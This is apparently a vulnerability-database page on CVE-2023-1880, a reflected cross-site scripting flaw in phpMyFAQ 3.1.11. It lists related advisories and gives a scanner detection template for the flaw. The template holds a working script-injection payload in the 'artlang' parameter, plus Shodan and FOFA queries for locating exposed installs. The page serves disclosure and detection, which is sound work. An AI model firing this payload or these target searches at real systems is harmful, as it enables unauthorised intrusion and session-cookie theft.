| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2023-1880 | 5 Apr 202320:26 | – | circl | |
| phpMyFAQ 跨站脚本漏洞 | 5 Apr 202300:00 | – | cnnvd | |
| CVE-2023-1880 | 5 Apr 202300:00 | – | cve | |
| CVE-2023-1880 Cross-site Scripting (XSS) - Reflected in thorsten/phpmyfaq | 5 Apr 202300:00 | – | cvelist | |
| Reflected XSS in send2friend.php | 17 Feb 202301:51 | – | huntr | |
| thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) via artlang parameter | 5 Apr 202318:30 | – | github | |
| CVE-2023-1880 | 5 Apr 202317:15 | – | nvd | |
| phpMyFAQ < 3.1.12 Multiple Vulnerabilities | 4 Apr 202300:00 | – | openvas | |
| CVE-2023-1880 Cross-site Scripting (XSS) - Reflected in thorsten/phpmyfaq | 5 Apr 202300:00 | – | osv | |
| GHSA-M8Q9-7V2F-QJX9 thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) via artlang parameter | 5 Apr 202318:30 | – | osv |
id: CVE-2023-1880
info:
name: Phpmyfaq v3.1.11 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.
impact: |
Unauthenticated attackers can inject malicious JavaScript through the unsanitized artlang parameter in send2friend functionality to steal user session cookies.
remediation: Fixed in 3.1.12 Version.
reference:
- https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e
- https://nvd.nist.gov/vuln/detail/CVE-2023-1880
- https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-1880
cwe-id: CWE-79
epss-score: 0.01644
epss-percentile: 0.73518
cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: phpmyfaq
product: phpmyfaq
shodan-query: http.html:"phpmyfaq"
fofa-query: body="phpmyfaq"
tags: cve2023,cve,huntr,xss,phpmyfaq,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "phpmyfaq") && contains(body, "<script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4a0a00473045022100c5a26eaa802e5a9f341bdbb108e22f544d2b2fa6ff0c6531c9ca1e0e00396c7f0220746f9479a5ac2a5e753f3b5b87fb8edb9905c716fd6e162cd2ec6c58725e3e62:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation